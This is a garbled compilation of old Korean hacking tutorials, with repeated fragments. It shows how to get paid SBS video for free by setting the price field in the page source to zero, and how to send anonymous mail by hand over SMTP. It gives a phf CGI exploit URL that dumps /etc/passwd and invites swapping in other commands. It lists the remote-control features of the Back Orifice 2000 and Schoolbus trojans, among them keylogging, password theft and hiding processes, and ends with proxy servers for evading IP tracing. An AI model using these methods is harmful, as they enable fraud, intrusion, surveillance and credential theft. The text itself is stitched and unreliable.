1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
By C.N.A
우선 멤버님들 공유해주셔서 감사합니다 ^^ 멤버님들위하여 자세히 설명하겠습니다
SBS http://www.sbs.co.kr
::::: [ T V ] ::::: ( TV ) Vod 유료 무료로 이용방법
SBS는 드라마나 방송 재방송을 VOD로 즐길 수 있는데 아쉽게도 유료져... 그러나...
약간의 편법을 쓰면 무료로 이용하실 수 있습니다
----------------------------------------- 본 론 ------------------------------------
우선 SBS에 접속하셔서 아이디가 없으시면 가입하시구 있으시다면 바로 로그인하세여
로그인이 끝나면 상단에 보시면 메뉴가 있습니다
TV , 라디오 , 뉴스 ,스포츠, 스타 , 재태크, 문화, 교육, 뮤직, 게임 , 골프, 만화, 영화등등
이번 자료에서 다룰것은 TV(VOD) , 만화(애니및 만화) , 영화 입니다 나머진 해보지도 않았어염
유룐지도 모르구여 ㅡㅡ;;
이제본격적으로 시작해보져... 지금은 TV니깐 당근 TV를선택하세여 http://tv.sbs.co.kr/
위에또 메뉴보시면 TV존이라고 있어염 현재 1월 13일 메뉴가 깜빡이네여 TV존 유료하면서...
http://tv.sbs.co.kr/tvzone/tvzone_Index.jhtml TV존 바로가기 입니다
이제여기서 원하는 방송프로그램을 선택하세여 전 피아노를 선택했습니다
피아노로 오시면 피아노 세부사항이뜨게쪄 당근^^
그럼 보시고자하는 횟수를 선택하세여 전 1회를 선택했습니다 저하구 똑같이해보시는것이
좋을듯... 1회왼쪽에 보시면 저속과 고속이있는데 이것이 방송속도니깐 알아서 하세여
전 고속으로 선택합니다. 선택하시면 새창이 뜨고 로그인안했음 로그인하라구하구
로그인했어도 한번더 물어봅니다 로그인합시다
그럼 결제창뜹니다. 그럼이제 결제창닫어여 ㅡ.,ㅡ 왜 닫냐구 따지고싶져 ㅡ.,ㅡ;;
그럼이제 다시 고속누르셧잖아염 다시 고속을 누르시는데 여기서 고속을 누른뒤 ESC를
눌러서 새창의 location 명령을 중지시키세여... 쉽게말해서 얌마 너 멈춰라고 ㅡ.,ㅡ
ESC키를 누르세염 그럼 이제 창이 흰색에서 멈춰있을겁니다 거기서 가장중요한
키 F11 키를 누르세염 그럼 흰창이 전체화면으로 바뀌면서 주소표시줄이
활성화됩니다
저와똑같이 하셧으면 다음과같은 주소가 주소표시줄에 있겠져
http://www.sbs.co.kr:8080/vodadm/mplay.php3?fname=dr0060d000&type=vid
음 주소표줄상태에서 http 앞에 다음과같은 명령어를 타이핑하세여
view-source:
즉 view-source:http://www.sbs.co.kr:8080/vodadm/mplay.php3?fname=dr0060d000&type=vid
그리고 엔터 그럼 메모장이하나 뜹니다 HTML 소스가 적혀있는 다음과같은 소스가!!
----- 소스 -------------------------------------------------------------------------
window.location='http://login.sbs.co.kr/Login/Login_PopupType2.jhtml?Login_ReturnURL=http://www.sbs.co.kr:8080/vodadm/mplay.php3?fname=dr0060d000&type=vid'피아노
window.resizeTo(360,479);
window.resizeTo(613,640); //원래크기613,468
// alert("vid");
document.billparam.submit();
------------------------------------------------------------------------------------------------
이제 다 끝났습니다 이 주소에서 피아노(혹은 님께서 선택하신 방송프로그램)의 결제값이있습니다
VOD값의 평균가격은 300~500입니다 방송보기전에 얼만지 체크해두시게좋겠져??
눈으로 찾기 귀찮으니깐 찾기로 500을 찾아보세염 그럼
이부분이 나옵니다 가격이 일정하지 않으니깐
price 로검색하는게 편하실겁니다. Value 즉 값을 0으로 바꿉니다
이렇게여 현재 작업은 소스보기를한 곳에서 이루어져야 합니다.
이렇게 작업한 소스를 이제 저장해야 합니다.
메모장의 메뉴표시줄에서 파일 다른이름으로저장하셔서 파일형식을 모든파일로 바꾸신다음에
파일이름을 test.htm 으로해주시기 바랍니다. 저장위치는 여러분이 원하는곳에...
그럼 파일이 생성되겠져??
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
::::: [ 만화 ] :::::
Candy33 , 애니캐스트 , 누들누드 , jj일본 , 레드존 , WXY ,
ex) 예제로 Candy33 서비스로 하엿습니다
원하는 애니보기를 클릭하면 결제동의창이 뜬다 여기서 소스보기를 하면...
다음과 같은 명령이 보인다.
lopf@netian.com
RCPT To: 는 사용자가 직접입력하고 lopf@netian.com 은 수신자의 E-mail의 주소를
입력
250 lopf@netian.com... recipient ok
DATA
DATA 라고 사용자 직접입력
354 Enter mail, end with "." on a line by itself
test anonymous mail
본문 내용 입력
best my friend
본문 내용 입력
.
마지막은 반드시 마침표(.)로 끝낸다.
250 AAA28476 Message accepted for delivery
QUIT
QUIT 라고 직접 입력
220 nownuri.net closing connection
Connection closed by foreign host.
이와 같이 진행하게 되면 발신자의 주소없이 메일의 발신이 가능하다.
따라서 계정이없는 어떤 서비스에서도 메일을 작성하여 발송할 수
있으며, 물론 사용 요금도 지불하지 않는다. 하지만 이런 익명성을
악용하여 상대방에게 피해를 주는 일은 없어야 할 것이며, 익명성이
필요한 부분에서 유용하게 사용될 수 있기를 바란다.
익명메일의 특징은 제목을 쓸 수 없다는 것이며, 헤더가 역시 전송되므로
발신자의 E-mail 주소는 모르더라도 헤더를 통해서 메일을 보낸 호스트의
추적이 가능하다는 것이다.
이 방법은 거의 모든 호스트에서 적용이 가능하므로 절차만 익혀둔다면
어느 시스템에서도 쉽게 이용할 수 있을것이다.
이미 거의 모든곳에 공개가 된것이기에
별 탈 없겠지 하구 공개합니다...
악용하진 마세요@!!!
어느 서버가 아파치 서버를 사용한다구 할때
딸려오는 phf 란 것이 있습니다
100.100.100.100 이라는 서버가 있을때
웹브라우져 상에서 이렇게 쳐보세요..
http://100.100.100.100/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
그럼 passwd 파일이 쫘르륵 열리죠..
넘 위험한가^^ 리모트 버그니..
머리가 좀 좋으신 분들은 벌써 아라차리셔게찌만
저기 뒷편에 있는 /bin/cat 과 /etc/passwd 를 바꿔서
잘 조합하면 오만가지 응용이 가능하다는것을 아실껍니다..
중간에 %20 은 한칸띠어~ 라는것을 아라차리신분도 대단..
자기 집에 아파치가 있다면 phf 한번 분석해 보세요..
그럼 다른것에도 응용이 되니까여..
근데.. 이거 썼다구 잡아가거나 하진 안겠죠??
이미 버그트랙같은데는 옛날에 나왔으니...
제 1부 해 킹 HACKING ▶제4회분◀
제2장 윈도우95 해킹하기!
☞윈도우95 로고 해킹
자, 먼저 여러분의 집에 뭔가 뻑적지근한 것을 좋아하는 친구들이 몰려들었다고 가정
하자. 그리고, 여러분은 그 친구들에게 자기가 정말로 끝내 주는 해커라고 자랑하고
싶어졌다고 치자. 그래서, 여러분이 폼 나게 컴퓨터를 켰는데, 기껏 화면에 뜬 것이라
고는 '윈도우95'라는 글자가 정말로 커다랗게 찍힌 로고이다. 정말 모욕적이군, 그렇
지 않은가? 여러분 컴퓨터는 아무 집에나 있는 장난감과 전혀 차이가 없는 것이다. 아
이큐가 80밖에 안되는 친구가 대기업에다 깔아 놓은 그 따분한 회사용 워크스테이션과
똑 같다는 말이다!
물론, 여러분이 정말로 심각한 해커라면, 여러분의 컴퓨터를 키자마자 리눅스나 프리
비에스디(FreeBSD)나 기타 모종의 유닉스가 PC에서 '짜잔!'하고 떠 줄 것이다. 그렇지
만, 지금 우리집에 있는 친구들은 그런게 떠도 도대체 그게 뭔지 이해할 수 없을 것이
다(이해를 해야 감동을 하지). 그러므로, 여러분은 지금 해커들이 사용하는 모종의 사
회 공학 기술을 사용하여, 자기가 끝내 주는 엘리트 해커라고 친구들이 떠벌리고 다니
게 만들 수 있는 좋은 기회를 잡은 것이다. 해야 할 일이라고는 부트-업 스크린을 조
금만 손 봐 주면 된다.
자, 예를 들어 컴퓨터를 켜면, 온통 까만 화면에 오렌지색과 노란색으로 불꽃이 번쩍
이고, '지구 종말을 예비하는 암흑의 동지'라는 구호가 뜨면 어떨까? 그렇지만, 이 정
도는 미칠 정도로 쉬운 일이다.
물론, 마이크로소프트사에서는 여러분이 컴퓨터를 켤 때마다 자기네가 심혈을 기울여
만든 운영 체제를 커다랗게 광고해 주면 얼마나 좋을까 하는 생각을 가지겠지. 실제
로, 그들은 자기네 운영 체제가 깔린 컴퓨터를 켤 때마다 그 잘난 마이크로$프트(Mic
ro$oft) 광고가 켜지도록 한 설계를 컴퓨터 판매업자들이 바꾸지 못하도록 하기 위해
법정에까지 간 역사가 있다.
그러니까 마이크로소프트사에서는 어쨌든 여러분이 부트-업 스크린을 바꾸지 말아 주
었으면 하고 간절히 바라고 있는 것임에는 틀림 없다. 따라서 M$사에서는 부트-업 스
크린을 바꾸는 소프트웨어를 최선을 다해 감추어 놓았다. 그렇지만, 그렇게 잘 감추지
는 못한 것 같다. 이제 우리는 바야흐로 그들의 음모를 완전히 뒤집어 버리는 방법을
배우게 될 것이다.
-----------------------
⊙ 사악한 천재를 위한 팁
해킹을 배움으로써 배울 수 있는 한 가지 좋은 점은, 제작가가 여러분이 함부로 바꾸
지 못하도록 하기 위해서 교묘하게 숨겨놓은 파일들을 찾아 낼 수 있다는 것이다. 그
리고, 여러분이 원하는 대로 바꿀 수 있다는 것이다. 오늘 우리가 배우는 것이 바로
그것이다.
윈도우95를 시작할 때 뜨는 그래픽은 바로 'c:\logo.sys'라는 파일에 숨어 있다. 이
파일의 내용을 보고 싶으면, 파일 관리자(explorer)를 열고, '보기(view)'를 클릭하
라. 그리고 '파일 종류별(by file type)'을 클릭한 다음, '숨김/시스템 파일 표시(sh
ow hidden/system files)'를 클릭하라. 다음 '보기(view)'로 다시 돌아와서 '자세히(
all file details)를 클릭하라. logo.sys라는 파일의 오른쪽에는 'rhs'라는 글자가 보
일 것이다. 그 뜻은 '읽기 전용, 숨은 파일, 시스템 파일(read-only, hidden, system
)'이라는 뜻이다.
이 짜증 나느 그래픽 파일-물론, 이 파일은 틀림 없는 그래픽 파일이다.-이 시스템
파일인 이유는 도대체 무엇일까? 그 이유는 바로 마이크로소프트사는 여러분이 그 내
용을 '윈도그95_바보들의 아침밥!'하는 따위로 바꾸지 말아 주었으면 하는 간절한 바
램 때문이다. 그러니까, 이 파일을 읽기 전용으로 만들고, 숨겨 놓고, 그것도 모자라
서 만일 여러분이 이 파일을 더럽히면 여러분의 컴퓨터는 맛이 갈 것이라는 착각을 하
도록 만들기 위해 이 파일을 거룩한 시스템 파일이라고 이름 붙인 것이다. 마이크로소
프트사는 여러분이 이 파일을 얌전히 내버려 두도록 하기 위해서 얕은 꾀를 쓴 것이다
설치 (Installation)
백오리피스 2000 백도어 프로스램 설치시 클라이언트와 서버로 나뉘게 된다. 서버에 백오리피스를 설치하는 것은 간단한 과정이다. 서
버 애플리케이션을 수행하면 백오리피스가 설치된다. 이 실행명은 bo2k.exe라고 명명되나, 다시 바뀔 수 있다. 또한 이 실행명은 클라이언트 설치시나 BO2K 설정 마법사에서 명기된다.
Figure 1 - Configuration Wizard
마법사는 서버파일 (실행파일), 네트웍 프로토콜(TCP 또는 UDP), 포트 넘버, 암호화 및 패스워드를 포함한 여러 설정과정을 거치게 될 것이다. 이 프로세스가 완료되면, 실행중인 bo2kgui.exe가 백오리피스에 대한 사용자 인터페이스를 수행한다.
Figure 2 - Back Orifice GUI
설정 마법사는 백 오리피스를 빠르게 사용하기 위해 몇몇 디폴트를 제안하여 빠른 셋업을 할 수 있도록한다. 그러나 많은 옵션들을 설정도구를 통해 수동적으로 설정될 수 있다. 이러한 옵션들은 백 오리피스 제거를 어렵게 만들 수 있다. 설정 마법사는 다음의 셋팅을 거치게된다. :
서버파일
네트웍 프로토콜 (UDP or TCP)
포트넘버
암호화 (XOR or 3DES)
패스워드/암호키
마법사가 완성되면, 백 오리피스 작동방법, 클라이언트/서버간의 통신을 위해 사용되는 셋팅과 프로그램 탐지를 방해하는 서버 설정 화면이 나타난다.
File Transfer
Option: File Xfer Net Type
설명 : 커뮤니케이션을 위한 네트웍 프로토콜 작성 및 변환
Option: File Xfer Bind Str
설명 : 파일전송 바인드 스트링, RANDOM은 디폴트값이다.
Option: File Xfer Encryption
설명 : 현재 암호화 방
식 작성 및 변환
Option: File Xfer Auth
설명 : 파일 전송 인증, 디폴트값은 NULLAUTH이다
TCPIO
Option: Default Port
설명 : TCP 커뮤니케이션을 위해 사용된 포트 표시 및 변환
UDPIO
Option: Default Port
설명 : UDP 커뮤니케이션을 위해 사용된 포트 표시 및 변환
Built-In
Option: Load XOR Encryption
설명 : 3DES보다 뒤떨어진 XOR 암호 부여 또는 제어
Option: Load NULLAUTH Authentication
설명 : NULLAUTH 인증 부여 또는 제어
Option: Load UDPIO Module
설명 : UDP 커뮤니케이션 부여 또는 제어
Option: Load TCPIO Module
설명 : TCP 커뮤니케이션 부여 또는 제어
XOR
Option: XOR Key
설명 : XOR 인증에 대한 패스워드 작성 및 변환
Startup
Option: Init Cmd Net Type
설명 : startup을 위한 네트웍 프로토콜 표시 및 변환
Option: Init Cmd Encryption
설명 : startup시 현재 암호값 표시
Option: Init Cmd Auth
설명 : startup을 위한 현재 인증 표시 및 변환
Option: Idle Timeout (ms)
설명 : 서버 의 시간초과나 연결 불가능시에 시간 변환(1000분의 1초) 가능
Stealth
Option: Run at startup
설명 : 컴퓨터 startup시 백오리피스 작동을 가능 또는 불가능하게 한다.
Option: Delete original file
설명 : 원래의 exe .파일을 삭제할 수 있다 (가능 또는 불가능)
Option: Runtime pathname
설명 : 실행시간 통로명(pathname) 값을 변환한다.
Option: Hide process
설명 : 프로세스가 숨겨지는 것을 가능 혹은 불가능하게 한다.
Option: Host process name (NT)
설명 : 호스트 기계상의 프로세스명을 변환한다. (디폴트는 백오리피스 2000임)
Option: Service Name (NT)
설명 : 원격관리서비스(Remote Administration Service)상의 서비스명을 유틸리티에서 명시된 다른 이름으로 변환한다.
Figure 3 - Server Configuration Utility
백오리피스의 사용
bo2kgui.exe가 실행되면, 작업공간이 나타난다. 만일 이전 것이 저장되었을 경우엔 서버 목록이 포함되어 있다. 서버는 시스템에 연결되어 백 오리피스가 시작하도록 설치한다. 서버명 , IP주소 및 연결정보가 서버에 입력되어야 한다.
Figure 4 - Edit Server Settings
서버가 설치되었으면, Server Command Client 프로그램이 나타난다. 이 윈도우는 백 오리피스의 기능을 사용할 수 있도록 허용한다. 하나의 카테고리를 클릭하면 기능들이 나타나게 되며, 이중 몇몇의 기능들은 (파일명이나 포트넘버와 같은) 패라미터를 요구한다.
Figure 5 - Server Command Client
서버 명령어(Server Commands)
백 오리피스내에는 70여개 이상의 명령어들이 포함되어 있다. 이 명령어들은 정보수집과 여러 지침들을 서버에 전송하는데 사용된다. 두 컴퓨터가 서로 연결되면 명령어가 선택되며 (적용시에는) 패라미터가 입력된다. 명령어 보내기(Send Command) 버튼은 선택된 서버로 명령어를 전송한다. 이에 대한 응답이 서버 응답 윈도우에 나타나게 된다.
Figure 6 - Workspace and Response Window
Simple
Command: Ping
설명 : 시스템에 대한 접근이 가능한지를 결정하기 위해 패킷을 서버로 전송한다.
Command: Query
설명 : 백오리피스 서버의 버전 넘버로 돌아간다.
System
Command: Reboot Machine
설명 : 시스템을 끄거나 재부팅한다.
Command: Lock-up Machine
설명 : 리부팅을 요구하는 원격시스템을 폐쇄한다.
Command: List Passwords
설명 : 사용자 및 패스워드 리스트를 검색한다.
Command: Get System Info
설명 : 다음의 정보를 검색한다.
시스템명
현재 사용자
프로세서
운영체제 시스템 버전(SP version)
메모리 (물리적 및 페이지)
고정 드라이브와 원격 드라이브
Key Logging
Command: Log Keystrokes
설명 : 파일에 keystroke를 로그한다. 출력물을 저장하기위해 파일명을 만든다.
Command: End Keystroke Log
설명 : 명시된 파일에 대한 기록 keystroke를 중지한다.
Command: View Keystroke Log
설명 : keystroke 로그파일을 검사한다.
Command: Delete Keystroke Log
설명 : keystroke 로그파일을 삭제한다.
GUI
Command: System Message Box
설명 :명시된 제목 및 텍스트를 포함한 서버상의 텍스트 박스를 표시한다.
TCP/IP
Command: Map Port -> Other IP
설명 : 네트웍 트래픽을 서버상의 명시된 포트로부터 다른 IP주소와 포트로 재설정한다.
Command: Map Port -> TCP File Receive
설명 : 파일을 명시된 포트로부터 받는다. 경로와 파일명 , 명시된 포트가 요구된다.
Command: List Mapped Ports
설명 : 재설정된 모든 포트와 정보(소스와 출처)를 리스트한다.
Command: Remove Mapped Port
설명 : 재설정된 특정 포트를 제거한다.
Command: TCP File Send
설명 : 특정 포트를 연결하여 파일을 전송한다. 경로, 파일명과 특정 목표의 IP주소 및 포트가 요구된다.
M$ Networking
Co
mmand: Add Share
설명 : 원격 시스템에 공유파일이 새로 창출된다. 경유명과 공유명이 요구된다.
Command: Remove Share
설명 : 공유파일을 제거한다. 공유명이 요구된다.
Command: List Shares
설명 : 서버 컴퓨터상에 모든 공유파일을 리스트한다.
Description: Lists all shares on the server computer.
Command: List Shares on LAN
설명 : LAN상의 공유파일을 리스트한다.
Command: Map Shared Device
설명 : 공유된 장치들을 맵(map)한다.
Description: Maps shared device.
Command: Unmap Shared Device
설명 : 특정 맵화된 공유장치들을 제거한다.
Description:Removes specified mapped shared device.
Command: List Connections
설명 : 원격 컴퓨터상에 네트웍 연결을 리스트한다.
Process Control
Command: List Processes
설명 : 서버상의 작동하는 모든 프로세스를 리스트하나다. 원격 시스템명이 요구된다.
Command: Kill Process
설명 : 특정 프로세스를 제거한다. 리스트 프로세스 명령어(List Processes command)에서 얻어진 프로세스 ID number가 요구된다.
Command: St
art Process
설명 : 경로명 및 논증들에 의해 명기된 서버상의 프로세스를 시작한다.
Registry
Command: Create Key
설명 : 레지스트리에 키를 생성한다. 완성된 키경로가 요구된다.
Command: Set Value
설명 : 레지스트리 키 값을 지정한다. 완성된 키 경로, 값어치명, 데이터가 명시되어야 한다.
Command: Get Value
설명 : 명시된 키 경로 및 키값에 대한 레지스트리 엔트리를 표시한다.
Command: Delete Key
설명 : 레지스트리 키를 삭제하고 완성된 키경로를 명시해야 한다.
Command: Delete Value
설명 : 명시된 키경로와 키값에 대한 레지스트리 키를 삭제한다.
Command: Rename Key
설명 : 레지스트리 키명을 새로 지정한다. 현재 키명과 새로 만들 키명이 요구된다.
Command: Rename Value
설명 : 레지스트리 값의 이름을 새로 지정한다. 현재 키 경로/값의 이름과 새로 만들 키 값의 이름이 요구된다.
Command: Enumerate Keys
설명 : 명시된 키경로에 대한 모든 하위키를 명시 및 계산한다.
Command: Enumerate Values
Multimedia
Command: Capture Video Still
설명 : 명시된 장치에서 무음향 비디오 영상을 capture한다. 명세사항을 capture하기 위해서는 파일명을 입력해야 한다.
Command: Capture AVI
설명 : 명시된 장치에서 AVI 파일을 capture한다. 명세사항을 capture하기 위해서는 파일명을 입력해야 한다.
Command: Play WAV File
설명 : 명시된 WAV 파일을 작동시킨다.
Command: Play WAV File In Loop
설명 : 멈출때까지 명시된 WAV파일을 반복적으로 작동시킨다.
Command: Stop WAV File
설명 : 작동하고 있는 WAV 파일을 멈춘다.
Command: List Capture Devices
설명 : 캡쳐링되는 비디오가 가능한 부착된 시스템 장치를 보여준다.
Command: Capture Screen
설명 : 현재 스크린상을 창출한다. 경로명니 파일 출력을 위해 필요하다.
File/Directory
Command: List Directory
설명 : 파일과 디렉토리를 명시된 시스템과 원격 경로지로부터 리스트한다.
Command: Find File
설명 : 서버 시스템상의 파일을 검색한다. 경로 및 파일명 명세서가 요구된다.
Command: Delete File
설명 : 파일을 서버 드라이브로부터 제거한다.
Command: View File
설명 : 명시된 파일이 검토되기 위해 고려된다.
Command: Move/Rename File
설명 : 파일을 이동 또는 새이름으로 지정한다. 기존의 또는 새 파일에 대한 경로명을 명시해야 한다.
Co
mmand: Copy File
설명 : 백오리피스 서버상의 파일을 복사한다. 소스를 명시해야 하며 통로명을 정한다.
Command: Make Directory
설명 : 서버상에 디렉토리를 만든다. 통로명이 요구된다.
Command: Remove Directory
설명 : 명시된 디렉토리를 제거한다.
Command: Set File Attributes
설명 : 명시된 통로명에 대한 파일 속성을 지정한다. (ARSHT)
Command: Receive File
설명 : 서버로부터 파일을 받는다. BINDSTR, NET, ENC, AUTH 및 통로명이 요구된다.
Command: Send File
설명 : 파일을 시스템에 전송한다. IP, NET, ENC, AUTH 및 통로명이 요구된다.
Command: List Transfers
설명 : 전송되는 파일 리스트를 보여준다.
Command: Cancel Transfer
설명 : 명시된 통로명 전송을 취소한다.
Compression
Command: Freeze File
설명 : 파일을 압축한다. 원래의 파일과 출력 파일에 대한 통로명이 요구된다.
Command: Melt File
설명 : 파일을 압축한다. 원래의 파일과 출력 파일에 대한 통로명이 요구된다.
DNS
Command: Resolve Hostname
설명 : 명시된 시스템의 IP주소와FQDN을 검색한다.
Command:
Resolve Address
설명 : 명시된 시스템의 IP주소와FQDN을 검색한다.
Server Control
Command: Shutdown Server
설명 : 서버상의 백오리피스를 중지시킨다. 명령어를 전송하기 전에 delete을 타이프해야 한다.
Command: Restart Server
설명 : Shutdown 서버 명령을 사용한 후에 백오리피스를 재시작한다.
Command: Load Plugin
설명 : 명시된 플러그인을 로드한다.
Command: Debug Plugin
설명 : 명시된 플러그인을 디버그한다.
Command: List Plugins
설명 : 설치된 플러그인을 리스트한다.
Cmmand: Remove Plugins
설명 : 명시된 플러그인을 제거한다.
프록시 서버란 IP 를 바꿀수 있는 곳이져..
proxy 서버.. 어느곳을 접속 하든 이곳을 지나서 가기 때문에..
IP 주소가 proxy 서버의 IP 주소로 나옵니다..
그러므로 IP 추적이 불가능 합니다..
100% 불가능 하지는 않지만..
그리고.. 프록시 서버를 사용 하시면 엄청 느려진다는 점도 고려 하시길..
프록시 서버를 사용 하는 방법은..(익스플로어)
메뉴중에서..
인터넷 옵션 - 연결 - Ctrl + S - 프록시 서버
하고선..
그곳에 프록시 서버 주소를 써 주시면 됩니다..
밑에 것들은 그곳에 쓸 프록시 서버 주소들 입니다..
빠른곳으로 잘 고르셔야 합니다..
ns2.neuquen.com.ar 8080
proxy.hutch.com.au 80
proxy.ozemail.com.au 8080
www2.transport.tas.gov.au 80
netcachesyd3.ozemail.com.au 8080
ino.privacy.fgov.be 8080
proxy1.brunet.bn 8080
CAICO.telern.com.br 80
www.csjlor.qc.ca 8080
237-67-239.tr.cgocable.ca 80
bw11chg.bluewin.ch 8080
proxy.iwvisp.com 8080
gateway.hro.com 080
CacheFlow01.RipNET.com 8080
inet01.cabletel.cz 80
proxy.compunet.net.co 3128
andele.cs.tu-berlin.de 80
maccaroni.unix-ag.uni-kl.de 3128
ics1f.og.srv.t-online.de 80
fastcache.vermontlaw.edu 8080
lhermes.curry.edu 8080
ES Softec linux.softec.es 8080
proxycf1.grolier.fr 80
proxy2.infonie.fr 80
gita.srce.hr 80
goldcache.goldnet.net.il 80
proxy.micanet.it 80
Cairo.osu.ac.jp 8080
dns1.infocom.co.jp 80
mirage.cc.toyaku.ac.jp 80
www.nidec.co.jp 8080
Taegu biho.taegu.ac.kr 8080
cvs2.kyunghee.ac.kr 8080
tole-cache.dial.bright.net 8080
cacheflow.bright.net 8080
cacheflow.tcg.sgi.net 8080
magic.brasilnet.net 8080
gip-rjo-1-wc01.br.global-one.net 8080
NET ? hoard.cache.thenap.net 8080
webproxy.gelrevision.nl 80
hades.hro.nl 8080
mail2.info.com.ph 3128
leonardo.isec.pt 8080
caclis01.teleweb.pt 3128
proxy.qatar.net.qa 8080
sea.plugcom.ru 80
utfc1.utfors.se 80
ns.varnamo.se 8080
swallow.cat.net.th 8080
ankara3.turnet.net.tr 8080
club.golden.com.tw 8080
c1.h202052106.is.net.tw 80
softy.poptel.org.uk 8080
cache.manistee-isd.k12.mi.us 80
stpauls.pvt.k12.al.us 8080
proxy.telcel.net.VE 80
sah3.ye 80
proxy-rnb2.mweb.co.za 80
proxy.cpt.mweb.co.za 80
proxy.cybergate.co.zw 8080
proxy.africaonline.co.zw 8080
옆에 숫자들은 포트 입니다..
포트 쓰는 곳에다가 쓰시면 되져..
그리고 옆에 있는 고급을 누르시면..
종류별로 프록시 서버를 다르게 사용 하실수도 있습니다..
그리고 일을 벌이시기 전에..
정말로 IP 주소가 바꼈는지 확인 하셔야 겠죠..?
http://www.tamos.com/bin/proxy.cgi
http://www.icefortress.com/html/guest/prxjdg-e.cgi
이 두곳은 프록시 서버를 사용 했는지 확인 할수 있는 곳입니다..
꼭 제대로 됐는지 확인 하시고 사용 하세요..
도스 모드 에서...
winipcfg.exe 를 치시면 현재 나의 IP 주소가 나옵니다..
그곳에 나온 IP 주소와 다른지 꼭 확인 하세요..
보낸 자신을 숨기고 메일을 보내자
혹시 누군가에게 하고 싶은 얘기가 있는데 자신의 신분을 밝히고
싶지 않은 경우가 있다. 이것은 자칫 장난삼아 악용될 우려도 있는
E-mail 팁이지만 꼭 필요한 때 유용하게 사용될 수 있으므로 소개한다.
우리가 사용하는 인터넷 메일 서비스의 메일 송신 기능인 Sendmail은
telnet의 25번 포트를 사용하고 있다. 따라서 Sendmail로 직접 끼어
들어서 (?) Sendmail이 수행하는 작업을 수동으로 해 주게 되면
사용자의 신분이 자동으로 기입되지 않으므로 발신자가 자기의
신분을 숨기고도 메일을 보낼 수 있다.
Sendmail을 이용한 메일 전송 ( telnet 모드에서 이용할 수 있다.)
여기서는 나우누리를 예로 한다. [blue]/home2/nownuri> telnet nownuri.net 25
계정이나 텔넷모드로 접속후 입력
Trying 302.238.128.51...
자동
Connected to nownuri.net
Escape character is '^]'.
220-nownuri.net Sendmail 8.612h2/8.6.12 ready at Wed, 12 Mar 1998 00:21:00 +0900
HELO
사용자가 입력해야할 부분 ( HELO를 입력 )
250 nownuri.net Hello blue.nownuri.net [203.238.128.22],pleased to meet you
MAIL From: my
MAIL
From: 은 사용자가 직접입력하고 my 라고되어 있는부분은 사용자가 임의로 입력가능
250 my... Sender ok
RCPT To: lopf@netian.com
RCPT To: 는 사용자가 직접입력하고 lopf@netian.com 은 수신자의 E-mail의 주소를
입력
250 lopf@netian.com... recipient ok
DATA
DATA 라고 사용자 직접입력
354 Enter mail, end with "." on a line by itself
test anonymous mail
본문 내용 입력
best my friend
본문 내용 입력
.
마지막은 반드시 마침표(.)로 끝낸다.
250 AAA28476 Message accepted for delivery
QUIT
QUIT 라고 직접 입력
220 nownuri.net closing connection
Connection closed by foreign host.
이와 같이 진행하게 되면 발신자의 주소없이 메일의 발신이 가능하다.
따라서 계정이없는 어떤 서비스에서도 메일을 작성하여 발송할 수
있으며, 물론 사용 요금도 지불하지 않는다. 하지만 이런 익명성을
악용하여 상대방에게 피해를 주는 일은 없어야 할 것이며, 익명성이
필요한 부분에서 유용하게 사용될 수 있기를 바란다.
익명메일의 특징은 제목을 쓸 수 없다는 것이며, 헤더가 역시 전송되므로
발신자의 E-mail 주소는 모르더라도 헤더를 통해서 메일을 보낸 호스트의
추적이 가능하다는 것이다.
이 방법은 거의 모든 호스트에서 적용이 가능하므로 절차만 익혀둔다면
어느 시스템에서도 쉽게 이용할 수 있을것이다.
1. Change Server port: 서버의 포트를 바꿔버립니다.
2. Enter Server Password: 서버에 패스워드를 겁니다.(남이 깔아놓은것에 손대지맙시다.)
3. Get System passwords: 시스템영역에 있는 패스워드를 추출해 줍니다.
4. Get Cached passwords: 시스템캐쉬영역의 패스워드 추출.
5. Clear Passwords: 패스워드 걸어놓은것을 지웁니다.
6. File Manager: 서버의 파일을 관리할수 있음.(삭제,추가등등)
7. Application Manager: 상대방이 무엇을 하는지 알려줌.
8. Keyboard Manager: 키보드에 입력하는것이 나타남.
9. Crash Windows: 임의로 윈도우에 에러메세지를 띄움.
10. Shut Down Windows: 로그오프,리부팅,컴꺼버리기등등...
11. Close Server: 일시적으로 트로이동작을 잠재움.(재부팅후 정상작동)
12. Remove Server: 서버에서 완전히 트로이를 소멸
13. Connect to: 서버의 아이피를 적고 침투.
14. Port: 1번에서 포트를 바꾸지 않는한 기본디폴트 54321번으로 잡힘.
15. Server Editor: 백오리의 플러그인역할.(아이콘바꾸기,감염아이피를 메일로 보내기...등등)
16. Ip Scanner: 스쿨버스에 감염된 아이피를 검색해줌.
17. Help,About: 도움말 및 제작자에 관하여...
18. Send Message: 메세지 보내기.- Open Chat: 아무때나 채팅을 할수있음.
19. Goto Web Page: 인터넷의 정해준 사이트로 이동시킴.
20. Open CD Drive: CD롬을 연다. - Close CD Drive: CD롬을 닫는다.
21. Swap Mouse Buttons: 마우스의 오른쪽,왼쪽을 바꾼다.-Control Mouse: 마우스를 제어.
22. Show Taskbar: 작업표시줄을 보이게함. - Hide Taskbar: 작업표시줄을 숨김.
23. Turn On,Off Monitor:모니터를 제어할수 있음.
24. Get Icq Uins: ICQ패스워드 추출.
25. Capture Desktop: 컴화면을 캡춰함.
26. Run Programme: 서버의 프로그램을 실행할수 있음.
27. Change Data/Time: 데이타의 날짜를 바꿀수 있음.
28. Set Wallpaper: Wallpaper로 저장.
29. Schoolbus Taskbar: 연결여부,캡춰스타터스를 알수있음.
백오리피스의 활용.. (bugui.exe 기초활용)
Deepbo 나 bugui 나 기능상에 큰 차이는 없습니다. bugui 에 대해서
기초적인 지식을 배워보도록 합시다. 대부분 Deepbo 의 내용과 비슷
하니 이번 강좌에서는 조금만 배워보도록 하죠.
Ping host
- 상대방 컴퓨터가 인터넷에 접속해있는지 확인하는 기능입니다. 맨
왼쪽 위의 Target host:port 에다가 IP 번호를 입력하세요. 포트
번호 31337 은 안 건드려도 상관 없습니다.
File copy
- 파일을 복사하는 기능입니다.그 컴퓨터에서 파일을 복사한다는 얘
기이지 내 컴퓨터로 파일을 끌어온다는 얘기는 아닙니다. 'Source
filename' 에는 복사할 파일명을 적어주시고, 'Target filename'
에는 복사할 경로를 적으시면 됩니다.
